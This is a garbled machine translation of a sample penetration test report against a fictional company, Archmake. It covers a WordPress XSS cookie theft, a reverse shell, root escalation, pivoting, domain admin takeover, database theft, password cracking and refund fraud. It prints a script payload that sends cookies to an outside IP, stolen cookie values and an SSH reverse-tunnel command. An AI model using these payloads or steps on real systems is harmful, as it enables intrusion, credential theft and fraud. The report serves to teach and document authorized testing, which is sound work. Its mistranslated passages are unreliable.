An Archmake. COM Penetration Test report

Preface
This is an example of a penetration test report released by offensive security. Offensive security is the creator of backtrack-linux.org and exploit-db.com.
Overview
Offensive security has been authorized to perform a penetration test on the external website of Archmake. the test and evaluation method is to simulate a malicious attacker to clearly target the company. in the early stage of information collection, it was found that Archmake only has one web site and one email server. fewer targets are available for attacks.
During the Security Evaluation of the website, it was found that a vulnerable WordPress plug-in was installed. this vulnerability was successfully exploited to gain WordPress management permissions. then I rebounded an interactive shell and successfully mentioned the root permission.
After obtaining the permissions of the website server, I began to penetrate the Intranet. After some attempts, I successfully obtained the permissions of the domain administrator. then, the Intranet topology is analyzed, and the company databases on the Intranet are found and controlled successfully. this database not only stores order information and customer information, but also stores transaction-related information. attackers can directly extract cash by controlling the system.
Test process
WordPressVulnerability Exploitation
During the collection of the target system, we found that the website was built with wordpress 3.3.1. While auditing the WordPress code, we scanned the target website with WPScan and found an insecure plug-in:
./Wpscan. rb -- url www.Archmake.com -- enumerate p
____________________________________________________
__
_______
_____
\\
// _ \/____ |
\\/ \// | |__) | (___
_________
\/| ___/\ ___ \/__|/_ '| '_\
\/|
____) | (__| (_ |
\/\/
| _ |
| _____/\ ___ | \__, _ | V1.1
WordPress Security identified by ethicalhack3r. co. uk
Sored by the RandomStorm Open Source Initiative
_____________________________________________________
| URL: http://www.Archmake.com/
| Started on Tue Jan 24 18:44:49 2012
[!] The WordPress theme in use is called "twentyeleven ".
[!] The WordPress "http://www.Archmake.com/readme.html" file exists.
[!] WordPress version 3.3.1 identified from meta generator.
[+] Enumerating installed plugins...
Checking for 2892 total plugins... 100% complete.
[+] We found 2 plugins:
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
[+] There were 1 vulnerabilities identified from the plugin names:
[!] Relevanssi 2.7.2 WordPress Plugin Stored XSS Vulnerability
* Reference: http://www.exploit-db.com/exploits/16233/
[+] Finished at Tue Jan 24 18:45:30 2012 as shown in WPScan scan results, this Relevanssi plug-in has an XSS vulnerability. Successful exploitation of this vulnerability can steal administrator cookies.
Step 1: Insert the following code in the search bar of the Archmake Website:
<Script> new Image (). src = "http: // 172.16.40.204/p. php? Cookie = "+ document. cookie; </script>








When the WordPress administrator clicks "User Searches" on the background management panel, the script is executed.

Remote attackers can receive the Administrator's cookie on the server.
GET
/P. php? Cookie = wordpress_ed8a4e5dd813c7b5d262130b08955a6a = admin % 7C1328098588
% 7C72c3335ad1e783b75bb3d8cf9e85fc9c; % 20wp-settings-time-1 = 1327925790; % 20wordpress_test_cookie = WP + Cookie + check; % 20wordpress_logged_ I
N_ed8a4e5dd813c7b5d262130b08955a6a = admin % 7C1328098588% 7Caf1bcabca49191de76e
C45e798ae5ada; % 20wp-settings-
1 = editor % 3 Dhtml; % 20wordpress_ed8a4e5dd813c7b5d262130b08955a6a = admin % 7C13275
99469% 7C3ada64cf8e918c9a4bf148896181fc63; % 20wordpress_logged_in_ed8a4e5dd81
3c7b5d262130b08955a6a = admin HTTP/1.1 and then use the cookie editor of firefox to modify the cookie. This allows you to bypass the WordPress login function and get an administrator session.


After obtaining the background administrator permission, you can obtain the full-site permission in many ways. The most direct thing is to modify the WordPress theme file.
WordPressPlug-in upload of any file type
After obtaining the permissions of the WordPress system, you can check whether other vulnerabilities may be exploited by attackers in the white box. Here, we have audited the plug-ins installed in WordPress.
An audit plug-in allows users to upload portraits.

By auditing the source code of this plug-in, it is found that it controls the type of uploaded files through a regular expression.

The file name such as ghost. php can also be uploaded to the server through regular expression detection.
Although there are many ways to upload subsequent attacks to the server (as mentioned above, such as modifying the topic ). however, we decided to use this vulnerability for upload. one is to verify a new vulnerability, and the other is to minimize the changes made to the server.

To verify that this upload process is exactly the same as what we analyzed, we first uploaded a standard image file for testing, and then uploaded a php script with the configured bounce shell.
Attackers can execute this script to obtain an interactive shell environment on the remote server controlled by attackers. Because the shell runs with the permissions of webserver, it only has low permissions.



LinuxLocal permission escalation
After obtaining the Interactive shell of the target website server, the next target is to obtain the root permission of the system.
Information about the target system is as follows: Linux version 2.6.32-5-686 (Debian 2.6.32-38) (ben@decadent.org.uk) (gcc version 4.3.5 (Debian 4.3.5-4 )) #1 SMP Mon Oct 3 04:15:24 UTC 2011
After some data searches and tests, we found that this system has a race condition defect. First, we uploaded the code using the Avatar upload plug-in.



Decompress the package, add the execution permission, and execute the exploitation program to successfully obtain the root permission.

Now, this website server can serve as a stepping stone for malicious attackers to penetrate the Intranet. if this is a real attack, any data on the website server is no longer credible, because attackers can modify the control at will.
Long-standing servers
After obtaining the Server Management permissions, you need to maintain a more stable connection for subsequent penetration.
Check the server and find that its ssh service runs on port 22000. we decided to use ssh to forward the Intranet port. this is convenient and will not bring additional security risks to the server.
To minimize system changes, we did not add an account or change the account password. Instead, we used SSH key-based authentication.
As mentioned above, SSH is enabled on port 53 on the self-controlled ssh server. You can forward port 22000 of the website server by executing the following command.
Ssh-o 'stricthostkeychecking no'-R 22000:127. 0.0.1: 22000-p 53 172.16.40.204 ping 127.0.0.1
In addition, you also need to create a SOCKS proxy so that attackers can use this proxy to access services in the target network.

VulnerabilitiesSplunk
When analyzing the configured website server, we found an intranet segment 10.10.0.x. scanning and analyzing the Intranet segment. We found a splunk server.
Splunk versions earlier than 4.2.5 have a high-risk remote command execution vulnerability. Through the SOCKS proxy described earlier, we accessed the Splunk web interface and confirmed that its version is 4.2.2.

In windows, splunk generally runs with the SYSTEM permission. Therefore, you can directly add an administrator user.

This command execution vulnerability does not display back. You can only log on to the Remote Desktop to verify whether the command is successfully executed.

Now we have another win server in the intranet.
Obtain domain management Permissions
Intranet penetration, and windows host. the next step is to obtain the permissions of the domain administrator. we upload WCE (Windows Credential Editor) to the splunk server. WCE can read authentication information from the memory and then use the authentication information to do some useful things.
Execute wce.exe on the splunkserver and obtain the token of the domain administrator from the memory.

With this authentication information, you can easily obtain a shell with domain administrator permissions.

Then, attackers can use the shell to run the Microsoft Management Console.

Database Data Utilization
After controlling the splunk server, a csv file is found in its local file system.

The analysis found that this is a file of customer information exported from the database.

Obviously, it should be the database information exported by the exportcsv.exe program. I analyzed the program with OD and found that it is directly connected to a ms SQL server. The authentication information connected is directly encoded in the program.

The obtained authentication information can be directly connected to the database, thus obtaining the permission to control all data in the database.


The exported database data is analyzed to find a large number of customer information, including user ID, name, email, phone number, encrypted password and other information.

The password is encrypted with md5. import these hash values into the password cracking tool we maintain for cracking. A total of 1000 hash entries were imported. After 22 seconds, 996 hash entries were successfully cracked. (VOICE: What is the rhythm ....)

ControlArchmakeTransaction
When conducting in-depth analysis on the database, we noticed that many tables will be updated on a regular basis. through monitoring and analysis of these tables, we found that this was originally a table related to orders. the information of these orders is regularly updated to the database. after a period of time, different processing will be performed based on the "Category" field.

After monitoring the database and adding some test data to the database, the meaning of the Categories field is summarized as follows:


Once the transaction type is determined, the related information will be inserted into this table. we found that if a valid user ID is inserted, the user information card information is filled with the credit card controlled by the attacker, and the transaction type is 4 (4 is a refund ). you can withdraw any amount of money to the attacker's credit card account. this has been confirmed in a controllable environment.